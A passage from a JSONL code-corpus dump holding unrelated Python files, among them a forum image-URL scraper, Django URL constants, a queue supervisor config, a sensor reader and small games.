plt.ylim(0, 100)\n #fig = plt.gcf()\n #gui.add_plot(fig)\n #v\n #refresh rate\n plt.pause(0.001)\n #cleans each instance of the graph to make it continous and smooth\n plt.clf()\n maxes.append(ma)\n\n except: #closes the plot(s) when ctrl-c is done in the terminal\n print(\"error\")\n print(max(maxes))\n break\n print(ma)\n plt.show()\n\n # close the stream gracefully\n stream.stop_stream()\n stream.close()\n p.terminate()\n plt.close('all')\n\ndef get_current_figure():\n return fig\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"311906048","text":"from xelo2.database import access_database, close_database\n\nfrom .paths import DB_ARGS\n\n\ndef test_open(qtbot):\n db = access_database(**DB_ARGS)\n\n n_tables = 31\n assert len(db['db'].tables()) == n_tables\n assert len(db['db'].tables()) == len(db['tables'])\n\n close_database(db)\n","sub_path":"tests/test_01_database.py","file_name":"test_01_database.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292236984","text":"# coding: utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport re\nimport time\nimport datetime\n\nHostreferer = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n\n}\n\nlocalBasicPath = \"C:\\\\Github\\\\CLTxtTest\\\\\"\ntxtPath = \"C:\\\\Github\\\\CLTxtTest\\\\\"\n\nbasicUrl = \"https://cl.bbbck.xyz\"\nstartPath = basicUrl + \"/thread0806.php?fid=16\"\n\nstopCount = 0\nmaxPage = 20\nminPage = 0\nnowPage = 0\n\n\ndef getMaxPage():\n maxPagePath = \"SaveData.txt\"\n file = open(maxPagePath)\n max = file.read()\n file.close()\n return int(max)\n\n\ndef open_URL(url):\n try:\n # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n req.encoding = \"gbk\"\n if req.status_code == 200:\n return req\n except Exception as e:\n print(\"except\", e)\n # for i in range(1, 10):\n # print('请求超时,第%s次重复请求' % i)\n # # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n # req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n # req.encoding = \"gbk\"\n # if req.status_code == 200:\n # return req\n time.sleep(50)\n # # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n req.encoding = \"gbk\"\n if req.status_code == 200:\n return req\n\n\n# 获得总页面html代码\ndef get_html(htmlUrl):\n req = open_URL(htmlUrl)\n html = \"\"\n try:\n html = req.text\n req.close()\n except Exception as e:\n print(\"except\", e)\n time.sleep(10)\n req = open_URL(htmlUrl)\n html = req.text\n return html\n\n\ndef rename(name):\n rstr = r'[\\/\\\\\\:\\*\\?\\<\\>\\|]'\n new_name = re.sub(rstr, \"\", name)\n return new_name\n\n\ndef saveTxt(name, datgaList):\n if \"\\\\\" in name:\n print(name)\n name = name.replace('\\\\', '')\n try:\n file = open(txtPath + name, 'w+')\n for oneData in datgaList:\n file.write(oneData.replace(u'\\xa0', u'') + \"\\n\")\n except Exception as e:\n print(name)\n print(\"except\", e)\n\n\ndef saveOneAlbumText(url, name, compareList):\n new_name = rename(name)\n # os.listdir(txtPath):\n if new_name+\".txt\" not in compareList:\n html = get_html(url)\n soup = BeautifulSoup(html, 'html.parser')\n # imgs = soup.findAll(\"input\", {\"type\": \"image\"})\n imgs = soup.findAll(\"img\")\n urlList = []\n print(\"第\" + str(nowPage + 1) + \"页\")\n print(\"图集--\" + name + \"--开始保存\")\n for i in range(0, len(imgs)):\n urlList.append(imgs[i].get('data-src'))\n saveTxt(new_name+\".txt\", urlList)\n print(\"图集--\" + name + \"保存成功\")\n return 0\n else:\n print(new_name + \"已存在\")\n return 1\n\n\ndef findAllAlbum(url):\n req = open_URL(url)\n soup = BeautifulSoup(req.text, 'html.parser')\n albums = soup.find_all(\"td\", {\"class\": \"tal\"})\n urlList = []\n nameList = []\n if nowPage == 0:\n albums = albums[9:-1]\n for album in albums:\n nameList.append(album.h3.a.string)\n urlList.append(basicUrl+\"/\"+album.h3.a.get('href'))\n return urlList, nameList\n\ndef save_one_page(url, compareList):\n\n results = findAllAlbum(url)\n urls = results[0]\n names = results[1]\n allURLLists = 0\n for i in range(0, len(urls)):\n allURLLists += saveOneAlbumText(urls[i], names[i], compareList)\n time.sleep(0.1)\n print(\"====================\")\n print(allURLLists)\n print(len(urls))\n print(\"====================\")\n if allURLLists == len(urls):\n print(\"已下载到完结页\")\n return True\n else:\n return False\n\ndef saveData():\n file = open(\"SaveData.txt\", 'w+')\n file.write(str(nowPage))\n\n\ndef canCreateNewFolder(path):\n if str(datetime.date.today()) not in os.listdir(path):\n return True\n else:\n return False\n\n\ndef getAllFileFromOneFolder(path):\n fileList = os.listdir(path)\n return fileList\n\n\ndef getAllfile(path):\n folderList = os.listdir(path)\n compareList = []\n for folderName in folderList:\n fileList = getAllFileFromOneFolder(localBasicPath + folderName)\n compareList += fileList\n return compareList\n\n\nif __name__ == '__main__':\n compareList = getAllfile(localBasicPath)\n if canCreateNewFolder(txtPath):\n txtPath += str(datetime.date.today()) + \"\\\\\"\n os.mkdir(txtPath)\n try:\n stopCount = maxPage\n for count in range(minPage, maxPage):\n stopCount = count + 1\n nowPage = count\n url = startPath + \"&search=&page=\" + str(count + 1)\n if save_one_page(url, compareList):\n break\n except Exception as e:\n print(\"爬取完成\")\n print(\"停止在\" + str(stopCount) + \"页\")\n # saveData()\n # os.system(\"shutdown -s -t 10\")\n print(\"下载完成\")\n else:\n print(str(datetime.date.today()) + \"文件夹已存在\")\n\n\n","sub_path":"CLURLTest.py","file_name":"CLURLTest.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308276668","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom base import conf\n\nADMINISTRATOR_PREFIX = \"ADMINISTRATOR\"\n\n\nADMINISTRATOR_LIST_URL_NAME = ADMINISTRATOR_PREFIX + conf.LIST_SUFFIX\nADMINISTRATOR_CREATE_URL_NAME = ADMINISTRATOR_PREFIX + conf.CREATE_SUFFIX\nADMINISTRATOR_DETAIL_URL_NAME = ADMINISTRATOR_PREFIX + conf.DETAIL_SUFFIX\nADMINISTRATOR_UPDATE_URL_NAME = ADMINISTRATOR_PREFIX + conf.UPDATE_SUFFIX\nADMINISTRATOR_DELETE_URL_NAME = ADMINISTRATOR_PREFIX + conf.DELETE_SUFFIX\n\nSPECIALIST_PREFIX = \"SPECIALIST\"\n\n\nSPECIALIST_LIST_URL_NAME = SPECIALIST_PREFIX + conf.LIST_SUFFIX\nSPECIALIST_CREATE_URL_NAME = SPECIALIST_PREFIX + conf.CREATE_SUFFIX\nSPECIALIST_DETAIL_URL_NAME = SPECIALIST_PREFIX + conf.DETAIL_SUFFIX\nSPECIALIST_UPDATE_URL_NAME = SPECIALIST_PREFIX + conf.UPDATE_SUFFIX\nSPECIALIST_DELETE_URL_NAME = SPECIALIST_PREFIX + conf.DELETE_SUFFIX\nSPECIALIST_WITH_PATIENTS_URL_NAME = SPECIALIST_PREFIX + \"_with_patients\"\n\nPATIENT_PREFIX = \"PATIENT\"\n\n\nPATIENT_LIST_URL_NAME = PATIENT_PREFIX + conf.LIST_SUFFIX\nPATIENT_CREATE_URL_NAME = PATIENT_PREFIX + conf.CREATE_SUFFIX\nPATIENT_DETAIL_URL_NAME = PATIENT_PREFIX + conf.DETAIL_SUFFIX\nPATIENT_UPDATE_URL_NAME = PATIENT_PREFIX + conf.UPDATE_SUFFIX\nPATIENT_DELETE_URL_NAME = PATIENT_PREFIX + conf.DELETE_SUFFIX\nPATIENT_ADD_PROCEDURE_URL_NAME = PATIENT_PREFIX + \"_add_procedure\"\n\nMACHINE_PREFIX = \"MACHINE\"\n\n\nMACHINE_LIST_URL_NAME = MACHINE_PREFIX + conf.LIST_SUFFIX\nMACHINE_CREATE_URL_NAME = MACHINE_PREFIX + conf.CREATE_SUFFIX\nMACHINE_DETAIL_URL_NAME = MACHINE_PREFIX + conf.DETAIL_SUFFIX\nMACHINE_UPDATE_URL_NAME = MACHINE_PREFIX + conf.UPDATE_SUFFIX\nMACHINE_DELETE_URL_NAME = MACHINE_PREFIX + conf.DELETE_SUFFIX\n\nTREATMENT_PREFIX = \"TREATMENT\"\n\n\nTREATMENT_LIST_URL_NAME = TREATMENT_PREFIX + conf.LIST_SUFFIX\nTREATMENT_CREATE_URL_NAME = TREATMENT_PREFIX + conf.CREATE_SUFFIX\nTREATMENT_DETAIL_URL_NAME = TREATMENT_PREFIX + conf.DETAIL_SUFFIX\nTREATMENT_UPDATE_URL_NAME = TREATMENT_PREFIX + conf.UPDATE_SUFFIX\nTREATMENT_DELETE_URL_NAME = TREATMENT_PREFIX + conf.DELETE_SUFFIX\n\nPROCEDURE_PREFIX = \"PROCEDURE\"\n\n\nPROCEDURE_LIST_URL_NAME = PROCEDURE_PREFIX + conf.LIST_SUFFIX\nPROCEDURE_CREATE_URL_NAME = PROCEDURE_PREFIX + conf.CREATE_SUFFIX\nPROCEDURE_DETAIL_URL_NAME = PROCEDURE_PREFIX + conf.DETAIL_SUFFIX\nPROCEDURE_UPDATE_URL_NAME = PROCEDURE_PREFIX + conf.UPDATE_SUFFIX\nPROCEDURE_DELETE_URL_NAME = PROCEDURE_PREFIX + conf.DELETE_SUFFIX\nPROCEDURE_ACTIVATE_MACHINE_URL_NAME = PROCEDURE_PREFIX + \"_activate_machine\"\n\nMACHINEINSTANCE_PREFIX = \"MACHINEINSTANCE\"\n\n\nMACHINEINSTANCE_LIST_URL_NAME = MACHINEINSTANCE_PREFIX + conf.LIST_SUFFIX\nMACHINEINSTANCE_CREATE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.CREATE_SUFFIX\nMACHINEINSTANCE_DETAIL_URL_NAME = MACHINEINSTANCE_PREFIX + conf.DETAIL_SUFFIX\nMACHINEINSTANCE_UPDATE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.UPDATE_SUFFIX\nMACHINEINSTANCE_DELETE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.DELETE_SUFFIX\n\nMACHINEINSTANCE_ACTIVATED_MESSAGE = _(\"Machine activated successfully\")\nMACHINEINSTANCE_UNACTIVATED_MESSAGE = _(\"Machine can't be activated at this moment\")\n\nMACHINEINPUT_PREFIX = \"MACHINEINPUT\"\n\n\nMACHINEINPUT_LIST_URL_NAME = MACHINEINPUT_PREFIX + conf.LIST_SUFFIX\nMACHINEINPUT_CREATE_URL_NAME = MACHINEINPUT_PREFIX + conf.CREATE_SUFFIX\nMACHINEINPUT_DETAIL_URL_NAME = MACHINEINPUT_PREFIX + conf.DETAIL_SUFFIX\nMACHINEINPUT_UPDATE_URL_NAME = MACHINEINPUT_PREFIX + conf.UPDATE_SUFFIX\nMACHINEINPUT_DELETE_URL_NAME = MACHINEINPUT_PREFIX + conf.DELETE_SUFFIX\n\n\n\nSECRETARY_PREFIX = \"SECRETARY\"\n\n\nSECRETARY_LIST_URL_NAME = SECRETARY_PREFIX + conf.LIST_SUFFIX\nSECRETARY_CREATE_URL_NAME = SECRETARY_PREFIX + conf.CREATE_SUFFIX\nSECRETARY_DETAIL_URL_NAME = SECRETARY_PREFIX + conf.DETAIL_SUFFIX\nSECRETARY_UPDATE_URL_NAME = SECRETARY_PREFIX + conf.UPDATE_SUFFIX\nSECRETARY_DELETE_URL_NAME = SECRETARY_PREFIX + conf.DELETE_SUFFIX\n\n","sub_path":"applications/core/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203518012","text":"#!/usr/bin/env python\n\"\"\"\n_AddRunLumi_\n\nMySQL implementation of AddRunLumi\n\"\"\"\n\nfrom builtins import str, bytes\n\nfrom Utils.IteratorTools import grouper\nfrom WMCore.Database.DBFormatter import DBFormatter\n\n\nclass AddRunLumi(DBFormatter):\n sql = \"\"\"insert dbsbuffer_file_runlumi_map (filename, run, lumi, num_events)\n select id, :run, :lumi, :num_events from dbsbuffer_file\n where lfn = :lfn\"\"\"\n\n def getBinds(self, filename=None, runs=None):\n\n binds = []\n\n if isinstance(filename, list):\n for entry in filename:\n binds.extend(self.getBinds(filename=entry['lfn'], runs=entry['runs']))\n return binds\n\n if isinstance(filename, (str, bytes)):\n lfn = filename\n elif isinstance(filename, dict):\n lfn = filename('lfn')\n else:\n raise Exception(\"Type of filename argument is not allowed: %s\" \\\n % type(filename))\n\n if isinstance(runs, set):\n for run in runs:\n for lumi in run:\n binds.append({'lfn': lfn,\n 'run': run.run,\n 'lumi': lumi,\n 'num_events': run.getEventsByLumi(lumi)})\n else:\n raise Exception(\"Type of runs argument is not allowed: %s\" \\\n % type(runs))\n return binds\n\n def format(self, result):\n return True\n\n def execute(self, file=None, runs=None, conn=None, transaction=False):\n for sliceBinds in grouper(self.getBinds(file, runs), 10000):\n result = self.dbi.processData(self.sql, sliceBinds, conn=conn,\n transaction=transaction)\n return self.format(result)\n","sub_path":"src/python/WMComponent/DBS3Buffer/MySQL/DBSBufferFiles/AddRunLumi.py","file_name":"AddRunLumi.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536039847","text":"import argparse\nimport glob\n\nimport pandas as pd\nimport torch\nfrom torchvision.transforms import transforms as T\nfrom tqdm import tqdm\n\nfrom inpainting.evaluate import evaluate_tracking, save_stats, save_results\nfrom inpainting.load import VideoDataset, DynamicMaskVideoDataset\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--output-masks-dir', type=str, default='results/demo/Tracker/OutputMasks')\nparser.add_argument('--target-masks-dir', type=str, default='data/processed/demo/Masks')\nparser.add_argument('--results-dir', type=str, default='results/demo/Tracker')\nopt = parser.parse_args()\n\n\noutput_masks_dataset = VideoDataset(\n list(glob.glob(f'{opt.output_masks_dir}/*')),\n 'mask'\n)\ntarget_masks_dataset = VideoDataset(\n list(glob.glob(f'{opt.target_masks_dir}/*')),\n 'mask'\n)\ndataset = DynamicMaskVideoDataset(output_masks_dataset, target_masks_dataset, transform=T.ToTensor())\n\nwith torch.no_grad():\n sample_dfs = []\n for i, (output_masks, target_masks) in enumerate(tqdm(dataset)):\n sample_df = evaluate_tracking(target_masks, output_masks)\n save_stats(sample_df.drop(columns=['t']), f'{opt.results_dir}/Misc/{i:05d}')\n sample_df['video'] = i\n sample_dfs.append(sample_df)\n\n df = pd.concat(sample_dfs)\n save_results(df, f'{opt.results_dir}')\n save_stats(df.drop(columns=['video', 't']), f'{opt.results_dir}')\n","sub_path":"scripts/evaluate_tracker.py","file_name":"evaluate_tracker.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420195878","text":"import random\n\nprint(\" \")\nprint(\"Rock, Paper, Scissors\")\n\ndef whoWon (c, u):\n if c.lower() == u:\n print(f\"Both players chose {c}. It's a tie!\")\n\n elif u == 'r':\n if c == \"S\":\n print(\"Rock smashes scissors. You Win!\")\n else:\n print(\"Paper covers rock. You lose!\")\n\n elif u == 'p':\n if c == 'R':\n print(\"Paper covers rock. You win!\")\n else:\n print(\"Scissors cut paper. You lose!\")\n\n elif u == 's':\n if c == 'P':\n print(\"Scissors cut paper.You win!\")\n else:\n print(\"Rock smashes scissors. You lose!\")\n\n\nwhile True:\n\n uAct = input(\"Enter a choice, Rock (r), Paper (p) or Scissors (s)? \")\n uAct = uAct.lower()\n\n PosCoAct = ['R', 'P', 'S']\n cAct = random.choice(PosCoAct)\n \n\n print(f\"You chose {uAct} and the computer chose {cAct}. \\n\")\n\n whoWon(cAct, uAct)\n\n pAg = input(\"Do you want to play again (Y/N)? \")\n if pAg.lower() == \"n\":\n print(\"Thank you for playing!\")\n break","sub_path":"Python Project 3.py","file_name":"Python Project 3.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368729942","text":"import json\nimport logging\n\nimport websockets\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\nfrom bot.worker.base import BaseWorker\n\n\nclass MinecraftWorker(BaseWorker):\n\n def __init__(self, app):\n self.app = app\n self.uri = app.config.get('minecraft', {}).get('uri', 'ws://localhost:8090')\n self.running = True\n self.ws = None\n\n async def process_message(self, message):\n msg = {}\n try:\n msg = json.loads(message)\n except:\n logging.info('got welcome msg')\n return\n\n if msg.get('type') == 'message':\n message_text = msg.get('data', {}).get('text')\n message_author = msg.get('data', {}).get('author')\n await self.app.telegram_worker.send_notification(f'{message_author}: {message_text}')\n elif msg.get('type') == 'webmap':\n message_text = msg.get('data', {}).get('text')\n await self.app.telegram_worker.send_notification(message_text)\n\n async def send_message(self, name, text):\n msg = {\n 'type': 'message',\n 'data': {\n 'text': text,\n 'author': name,\n }\n }\n\n json_msg = json.dumps(msg)\n await self.ws.send(json_msg)\n\n async def run(self):\n try:\n async with websockets.connect(self.uri) as websocket:\n self.ws = websocket\n while self.running:\n message = await websocket.recv()\n await self.process_message(message)\n except websockets.WebSocketException as e:\n logging.error(e)\n exit(1)\n except Exception as e:\n logging.error(e)\n exit(1)\n\n async def stop(self):\n pass\n","sub_path":"bot/worker/minecraft.py","file_name":"minecraft.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19350311","text":"import RPi.GPIO as GPIO \nimport time\n\n#Setup:\nGPIO.setwarnings(False) #*Since will run a while loop -> Will be in a while loop so im resetting all warnigns\nGPIO.cleanup() #*Since will run a while loop -> Need to add this so pins are fully cleaned up. Need to cean up so that i cant damage board if i accedintaly connect a HIGH port to GROUND. This Insures all pins are inputs (so cant damage!)\nGPIO.setmode(GPIO.BCM)\n\nTRIG_pin = 4\nECHO_pin = 18\nGPIO.setup(TRIG_pin, GPIO.OUT)\nGPIO.setup(ECHO_pin, GPIO.IN)\n\ndef get_distance():\n #Send out the wave for a moment:\n GPIO.output(TRIG_pin, True) \n time.sleep(.001) \n GPIO.output(TRIG_pin, False) \n #Get the wave and calculate the distance by using the time the wave was in the air:\n while GPIO.input(ECHO_pin) == False:\n start = time.time()\n while GPIO.input(ECHO_pin) == True: \n end = time.time()\n sig_time = end - start \n distance_cm = sig_time / 0.000058 \n distance_in = sig_time / 0.000148 \n #Ending Stuff:\n print('Distance: {} cm'.format(distance_cm))\n return distance_cm\n #GPIO.cleanup() - removing this because if we cleanup after every loop, the pin definitions will be gone\n\nwhile True:\n distance = get_distance();\n time.sleep(.05)\n\n\n\n\n\n\n","sub_path":"RaspberryPi_Tutorials/sonar_RunConstantly.py","file_name":"sonar_RunConstantly.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88701622","text":"import sys\nimport os\nimport calendar\nimport datetime\nmonth_list = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef is_leap(year):\n return year%4 == 0 and (year%100 !=0 or year%400 ==0)\n\ndef month_day(year, month):\n if not 1 <= month <= 12:\n # if 1 <= month and month >= 12:\n return \"Invalid month\"\n\n if month == 2 and is_leap(year): \n return 29\n\n return month_list[month]\n\n# s = raw_input(\"Enter raw:\")\n# #print(\"s\",s)\n# print(dir(s))\n\n# print(month_day(2020, 0))\n# print(sys.path)\n# datew =\"\"\ndat = datetime.datetime.today()\nprint(\"Date:\",dat)\nsentence = 'Date: {0:%Y%d}'.format(dat)\nprint(sentence)\n# date = datetime.datetime(dat)\n# date.strftime('%m%d%y')\nprint(\"DATE TIME APPEND:\",datetime.datetime.today().strftime('%B,%Y%d%m'))\nprint(calendar.isleap(2019))\npath = os.getcwd()\npath1 = \"\\welome\\one.py\"\nprint(\"PAth\", path)\nprint(\"PAth1\", path1)\npaths = os.path.join(os.getcwd(), \"test.txt\")\nprint(os.listdir())\nprint(paths)\nprint(os.__file__)\nprint(\"Home:\",os.environ.get('HOME'))\n\n# print(month_day(2020, 2))\n\n# list = [1,2,3,4]\n# lists =[11,12,13,14]\n# list[2] = 4 \n# print(list)\n# list.remove(4)\n# print(list)\n# print(type(list))\n\n# tuple = (1,2,3,4,5)\n# tuples = (11,12,13,14)\n# tupless= tuple + tuples\n# print(tupless)\n\n\n# a = 'test'\n# b = 'tests'\n# print(a is b)\n\nx = \"global x\"\n\ndef outer():\n\tglobal x\n\tx = \"outer x\"\n\n\tdef inner():\n\t\t# global x\n\t\tx =\"inner x\"\n\t\tprint(x)\n\n\tinner()\n\tprint(x)\n\nouter()\nprint(x)","sub_path":"Leap_Year.py","file_name":"Leap_Year.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"542850985","text":"import math\n\n# finds x: x = cos(x)\n# use binary search!\ndef solve_equation():\n left, right = -100, 100\n epsilon = 10 ** (-7)\n while left <= right - epsilon:\n middle = (left + right) / 2\n y = middle - math.cos(middle) #our function\n if y < 0:\n left = middle\n else:\n right = middle\n return middle\n\nx = solve_equation()\nprint(x, math.cos(x), abs(x - math.cos(x)))","sub_path":"algos&structures/21-09-2016/equation.py","file_name":"equation.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"329303555","text":"#!/usr/bin/env python3\n\"\"\"\nconvert Gemini3D old raw binary neutral data to HDF5 .h5\nrequires \"simsize.dat\" file to be present in the same directory at the neutral .dat files\n\"\"\"\n\nimport typing\nfrom pathlib import Path\nimport argparse\nimport h5py\n\nimport gemini3d.raw.read as raw_read\n\nimport gemini3d.write as write\n\np = argparse.ArgumentParser()\np.add_argument(\"indir\", help=\"Gemini .dat file directory\")\np.add_argument(\"outdir\", help=\"directory to write HDF5 files\")\nP = p.parse_args()\n\nindir = Path(P.indir).expanduser()\noutdir = Path(P.outdir).expanduser()\n\ninfiles: typing.Iterable[Path]\nif indir.is_file():\n infiles = [indir]\n indir = indir.parent\nelif indir.is_dir():\n infiles = indir.glob(\"*.dat\")\nelse:\n raise FileNotFoundError(indir)\n\noutdir.mkdir(parents=True, exist_ok=True)\n\n# %% convert simsize\nlx = raw_read.simsize(indir)\nprint(f\"{indir} lx:\", lx)\nwith h5py.File(outdir / \"simsize.h5\", \"w\") as f:\n f[\"lx1\"] = lx[0]\n f[\"lx2\"] = lx[1]\n# %% convert data\ni = 0\nfor infile in infiles:\n if infile.stem in {\"simsize\", \"simgrid\", \"initial_conditions\"}:\n continue\n\n outfile = outdir / (f\"{infile.stem}.h5\")\n print(infile, \"=>\", outfile)\n i += 1\n\n dat = raw_read.neutral2(infile)\n\n dat[\"dn0all\"] = dat[\"dn0all\"].transpose()\n dat[\"dnN2all\"] = dat[\"dnN2all\"].transpose()\n dat[\"dnO2all\"] = dat[\"dnO2all\"].transpose()\n dat[\"dvnrhoall\"] = dat[\"dvnrhoall\"].transpose()\n dat[\"dvnzall\"] = dat[\"dvnzall\"].transpose()\n dat[\"dTnall\"] = dat[\"dTnall\"].transpose()\n\n write.neutral2(dat, outfile)\n\nif i == 0:\n raise FileNotFoundError(f\"no .dat files found in {indir}\")\n\nprint(f\"DONE: converted {i} files in {indir} to {outdir}\")\n","sub_path":"scripts/convert_neutral.py","file_name":"convert_neutral.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548231566","text":"from __future__ import unicode_literals, print_function, division\nfrom veil.profile.installer import *\nfrom .redis_setting import redis_program\n\n\ndef queue_program(host, port):\n return objectify({'queue': redis_program('queue', host, port, persisted_by_aof=True).queue_redis})\n\n\ndef resweb_program(resweb_host, resweb_port, queue_host, queue_port):\n return objectify({\n 'resweb': {\n 'execute_command': 'resweb',\n 'environment_variables': {'RESWEB_SETTINGS': VEIL_ETC_DIR / 'resweb.cfg'},\n 'resources': [('veil.backend.queue.resweb_resource', {\n 'resweb_host': resweb_host,\n 'resweb_port': resweb_port,\n 'queue_host': queue_host,\n 'queue_port': queue_port\n })]\n }\n })\n\n\ndef delayed_job_scheduler_program(queue_host, queue_port, logging_level):\n return objectify({\n 'delayed_job_scheduler': {\n 'execute_command': 'veil sleep 3 pyres_scheduler --host={} --port={} -l {} -f stderr'.format(queue_host, queue_port, logging_level),\n 'priority': 210,\n 'resources': [('veil_installer.component_resource', {'name': 'veil.backend.queue'})],\n 'startretries': 10\n }\n })\n\n\ndef periodic_job_scheduler_program(application_logging_levels, application_config):\n veil_logging_level_config_path = VEIL_ETC_DIR / 'periodic-job-scheduler-log.cfg'\n resources = [\n veil_logging_level_config_resource(path=veil_logging_level_config_path, logging_levels=application_logging_levels),\n component_resource(name='veil.backend.queue'),\n application_resource(component_names=list_dynamic_dependency_providers('periodic-job', '@'), config=application_config)\n ]\n return objectify({\n 'periodic_job_scheduler': {\n 'execute_command': 'veil backend queue periodic-job-scheduler-up',\n 'priority': 220,\n 'environment_variables': {\n 'VEIL_LOGGING_LEVEL_CONFIG': veil_logging_level_config_path,\n 'VEIL_LOGGING_EVENT': 'True'\n },\n 'redirect_stderr': False,\n 'resources': resources,\n 'patchable': True\n }\n })\n\n\ndef job_worker_program(worker_name, pyres_worker_logging_level, application_logging_levels, queue_host, queue_port, queue_names, application_config,\n run_as=None, count=1, timeout=120):\n veil_logging_level_config_path = VEIL_ETC_DIR / '{}-worker-log.cfg'.format(worker_name)\n application_component_names = set(name for queue_name in queue_names for name in list_dynamic_dependency_providers('job', queue_name))\n resources = [\n veil_logging_level_config_resource(path=veil_logging_level_config_path, logging_levels=application_logging_levels),\n component_resource(name='veil.backend.queue'),\n application_resource(component_names=application_component_names, config=application_config)\n ]\n pyrse_log_path = VEIL_LOG_DIR / '{}_worker-pyres.log'.format(worker_name)\n programs = {}\n for i in range(count):\n programs.update({\n '{}_worker{}'.format(worker_name, i + 1): {\n 'execute_command': 'veil sleep 10 pyres_worker --host={} --port={} -t {} -l {} -f {} {}'.format(\n queue_host, queue_port, timeout, pyres_worker_logging_level, pyrse_log_path, ','.join(queue_names)\n ), # log instruction for the main process, a.k.a pyres_worker\n 'environment_variables': {\n 'VEIL_LOGGING_LEVEL_CONFIG': veil_logging_level_config_path,\n 'VEIL_LOGGING_EVENT': 'True'\n }, # log instruction for the sub-process forked from pyres_worker, a.k.a our code\n 'group': 'workers',\n 'run_as': run_as or CURRENT_USER,\n 'priority': 200,\n 'resources': resources,\n 'startretries': 10,\n 'startsecs': 5,\n 'redirect_stderr': False,\n 'patchable': True\n }\n })\n return objectify(programs)","sub_path":"src/veil/backend/queue_setting.py","file_name":"queue_setting.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4882589","text":"map = {\n \"size_x\": 5,\n \"size_y\": 5\n}\n\nplayer = { \"x\":3, \"y\":4}\n\nboxes = [\n {\"x\": 1,\"y\": 1},\n {\"x\": 2,\"y\": 2},\n {\"x\": 3,\"y\": 3}\n]\n\ndestination = [\n {\"x\": 2,\"y\": 1},\n {\"x\": 3,\"y\": 2},\n {\"x\": 4,\"y\": 3}\n]\nplayer1 = [0]\nbox1 = [0]\nplaying = True\nwhile playing:\n # print map\n for y in range(map['size_y']):\n for x in range(map['size_x']):\n\n player_is_here = False\n if y == player['y'] and x == player['x']:\n player_is_here = True\n\n box_is_here = False\n for box in boxes:\n if y == box['y'] and x == box['x']:\n box_is_here = True\n\n destination_is_here = False\n for des in destination:\n if y == des['y'] and x == des['x']:\n destination_is_here = True\n\n if player_is_here:\n print(\"P \", end='')\n elif box_is_here:\n print(\"B \", end='')\n elif destination_is_here:\n print(\"D \", end='')\n else:\n print(\"_ \", end='')\n print()\n # end of print map\n\n # checkwin\n win = True\n for box in boxes:\n if box not in destination:\n win = False\n\n if win:\n print(\"YOU WIN!!\")\n break\n \n dx = 0\n dy = 0\n\n move = input(\"Your move: \").upper()\n if move == \"W\":\n dy = -1\n elif move == \"S\":\n dy = 1\n elif move == \"A\":\n dx = -1\n elif move == \"D\":\n dx = 1\n elif move == \"Z\":\n player['x'] = 0 - last_step_player['x']\n player['y'] = 0 - last_step_player['y']\n for box in boxes:\n box['x'] = 0 - last_step_player['x']\n box['y'] = 0 - last_step_player['y']\n else:\n playing = False\n if 0 <= player['x'] + dx < map['size_x'] and 0 <= player['y'] + dy < map['size_y']:\n player['x'] += dx\n player['y'] += dy\n\n for box in boxes:\n if box['y'] == player['y'] and box['x'] == player['x']:\n box['x'] += dx\n box['y'] += dy\n player1[0] = {\"x\": dx,\"y\": dy}\n last_step_player = player1.copy()\n# copy/clone/deep clone","sub_path":"Session05/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561697553","text":"\"\"\" This template implements the star.py <> ModelTrainer event pattern with the Matlab Python Engine.\npython hub.py --train-brain=brain_name\nstart python hub.py --brain sh1\n\"\"\"\n\nimport sys, argparse, logging, datetime, time, os, io\nimport numpy as np\nimport random\nimport 